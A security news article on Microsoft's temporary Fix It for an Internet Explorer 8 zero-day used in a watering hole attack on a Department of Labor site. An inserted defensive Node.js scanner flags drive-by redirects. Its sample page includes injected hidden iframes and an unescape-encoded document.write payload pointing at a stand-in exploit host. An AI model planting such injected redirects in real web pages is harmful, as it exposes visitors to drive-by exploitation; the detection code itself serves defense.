Microsoft has released a Fix It to address an Internet Explorer 8 zero-day that was exploited in a watering hole attack against the U.S. Department of Labor website last week.
The Fix It is a temporary mitigation until a patch is released. Microsoft's next scheduled Patch Tuesday security updates are set for next week, though it is unlikely an update for CVE-2013-1347 will be ready in time.
Microsoft said the vulnerability is present only in IE 8. The flaw is a use-after-free memory corruption bug that lets a remote attacker execute arbitrary code on the machine of a user who visits a malicious web page.
"The Fix It is an effort to help protect as many customers as possible, as quickly as possible," said Dustin Childs, group manager, Microsoft Trustworthy Computing.
This is the second Fix It that Microsoft has issued this year. The first, in January, was also for a similar memory corruption vulnerability in IE that was used in watering hole attacks against a number of government, political and manufacturing websites. IE 8 was the primary target there as well; IE 6 and 7 were also vulnerable, though no public exploits existed for those two versions.
According to Net Market Share, IE 8 has the highest market share with 23 percent, followed by IE 9 (18 percent) and Chrome 26.0 (13 percent). Experts who analyzed the attack against the Department of Labor’s Site Exposure Matrices website said that the typical government agency worker would likely still be running IE 8, making them a tempting target for such an attack.
Watering hole attacks reuse the mechanics of a drive-by download: the attacker compromises a legitimate site (or an ad or media file it serves) and injects a hidden iFrame or a snippet of JavaScript that silently sends the visitor's browser to a third-party server. That server fires an exploit against the browser or a plugin such as Flash or Java, and the payload either installs more malware or steals credentials. What distinguishes the watering hole is the targeting: rather than spear phishing a narrow list of potential victims, the attacker infects a site of specific interest to those victims and waits for them to visit.
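As an added illustration of the injected-redirect mechanics described above (example code written for this edit, not code from the original article or from any of the researchers it cites), the following Node.js script scans a page's HTML for the usual drive-by tells: an iframe pointing off-site, sized to zero or hidden by CSS, or a script that assembles one at runtime with document.write and unescape. The sample page, the hostnames and the pattern list are all constructed for the example and are not taken from the Department of Labor incident.

```javascript
// Added example, not code from the original article: heuristic scan of page
// HTML for an injected drive-by redirect (hidden off-site iframe, or a script
// that writes one at runtime). The sample page and hostnames are constructed.

const IFRAME_TAG = /<iframe\b[^>]*>/gi;
const SCRIPT_BLOCK = /<script\b[^>]*>[\s\S]*?<\/script>/gi;

// Value of one attribute inside a raw tag string; handles "x", 'x' and bare x.
function attr(tag, name) {
  const re = new RegExp(`\\b${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, 'i');
  const m = tag.match(re);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// Hostname of an absolute URL, or null for relative or malformed values.
function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch (e) { return null; }
}

function isOffSite(host, siteHost) {
  return host !== null && host !== siteHost && !host.endsWith('.' + siteHost);
}

// Why an <iframe> looks like an injected redirect rather than page content.
function iframeReasons(tag, siteHost) {
  const reasons = [];
  const host = hostOf(attr(tag, 'src') || '');
  if (isOffSite(host, siteHost)) reasons.push('off-site src ' + host);
  const w = parseInt(attr(tag, 'width') || '', 10);
  const h = parseInt(attr(tag, 'height') || '', 10);
  if ((!isNaN(w) && w <= 1) || (!isNaN(h) && h <= 1)) reasons.push('zero-size frame');
  const style = (attr(tag, 'style') || '').toLowerCase();
  if (/display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d/.test(style)) {
    reasons.push('hidden by style');
  }
  return reasons;
}

// Scripts that build the iframe at runtime to defeat naive string matching.
const SCRIPT_PATTERNS = [
  [/document\.write\s*\(\s*['"]\s*<iframe/i, 'document.write of iframe'],
  [/unescape\s*\(\s*['"][^'"]*%3C(?:iframe|%69%66%72%61%6D%65)/i, 'unescape-encoded iframe'],
];
const LOCATION_REDIRECT = /(?:window|document|top|self)\.location(?:\.href)?\s*=\s*['"](https?:\/\/[^'"]+)/i;

// Returns one finding per suspicious iframe or script, each with its reasons.
function scanPage(html, siteHost) {
  const findings = [];
  for (const tag of html.match(IFRAME_TAG) || []) {
    const reasons = iframeReasons(tag, siteHost);
    if (reasons.length) findings.push({ kind: 'iframe', src: attr(tag, 'src'), reasons });
  }
  for (const script of html.match(SCRIPT_BLOCK) || []) {
    const reasons = SCRIPT_PATTERNS.filter(([re]) => re.test(script)).map(([, why]) => why);
    const m = script.match(LOCATION_REDIRECT);
    if (m && isOffSite(hostOf(m[1]), siteHost)) reasons.push('redirect to ' + hostOf(m[1]));
    if (reasons.length) findings.push({ kind: 'script', reasons });
  }
  return findings;
}

// Constructed sample: one legitimate same-site frame, one injected hidden
// off-site frame, and one script that decodes and writes a second frame.
const SAMPLE_HTML = `
<html><body>
<h1>Reference page</h1>
<iframe src="https://www.example.gov/help/faq.html" width="600" height="400"></iframe>
<iframe src="http://exploit.example.net/index.php" width="0" height="0" style="display:none"></iframe>
<script>document.write(unescape('%3Ciframe src=%22http://exploit.example.net/x.html%22 width=1 height=1%3E%3C/iframe%3E'));</script>
</body></html>`;

console.log(JSON.stringify(scanPage(SAMPLE_HTML, 'www.example.gov'), null, 2));
```

Run it with `node scan.js` against saved HTML of a site you are responsible for. The heuristics are deliberately loose: a same-site frame with no hiding indicators is ignored, while an off-site frame, a zero-size or CSS-hidden frame, or a script that decodes and writes frame markup is reported with every reason that fired, so an analyst can triage hits rather than treat each as a verdict.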
This tactic has been employed not only against government workers and political activists as part of espionage campaigns, but against a popular mobile developer’s website that ensnared a number of Facebook, Apple, Microsoft and Twitter employees.
In the case of the DoL, the target was likely downstream employees of the Department of Energy who work on nuclear weapons programs, experts at Invincea speculated. The DoL's SEM site is a resource for employees who may have been exposed to radiation. The redirect on the site was sending visitors to a site hosting the Poison Ivy remote access Trojan, malware used in espionage campaigns; it opens a backdoor on compromised computers through which attackers can move about unnoticed.
Microsoft’s first Fix It of 2013, however, wasn’t a smashing success. Shortly after it was released, researchers at Exodus Intelligence reported they were able to bypass it. While the Fix It did address one means attackers had at their disposal to get onto victims’ machines, it didn’t address all possible avenues.